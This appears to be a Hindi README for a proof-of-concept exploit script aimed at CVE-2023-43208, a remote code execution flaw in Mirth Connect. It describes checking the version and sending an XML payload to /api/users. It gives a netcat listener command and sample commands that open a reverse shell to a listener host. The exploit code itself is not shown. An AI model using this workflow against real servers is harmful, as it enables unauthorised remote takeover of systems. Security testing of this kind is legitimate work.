
CVE-2023-43208 RCE शोषण के लिए PoC।
प्रूफ-ऑफ-कॉन्सेप्ट पायथन स्क्रिप्ट जो Mirth Connect में CVE-2023-43208 को लक्षित करती है।
केवल उन वातावरणों में उपयोग करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आप स्पष्ट रूप से अधिकृत हैं। यह रिपॉजिटरी सुरक्षा अनुसंधान, सत्यापन और रक्षात्मक परीक्षण के लिए है। लेखक इस उपकरण द्वारा किए गए किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।
exp.py PoC का एक न्यूनतम-निर्भरता संस्करण है जो:
/api/server/version से Mirth Connect संस्करण का अनुरोध करता है4.4.1 से कम है या नहीं/api/users पर एक XML पेलोड भेजता हैस्क्रिप्ट डिफ़ॉल्ट रूप से HTTPS का उपयोग करती है और --http के साथ पर स्विच की जा सकती है।
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]
-u, --url: लक्ष्य Mirth Connect URL या होस्ट-lh, --lhost: रिवर्स कनेक्शन के लिए स्थानीय होस्ट/IP-lp, --lport: स्थानीय सुनने का पोर्ट--http: HTTPS के बजाय HTTP बलपूर्वक उपयोग करें (डिफ़ॉल्ट HTTPS है)पहले एक लिसनर शुरू करें:
nc -lvnp 4444
स्क्रिप्ट चलाएँ:
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444
HTTP-मात्र लक्ष्य के लिए:
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http
4.4.1 के विरुद्ध सिमैंटिक तुलना पर आधारित है।K3ysTr0K3R और Chocapikkpredyy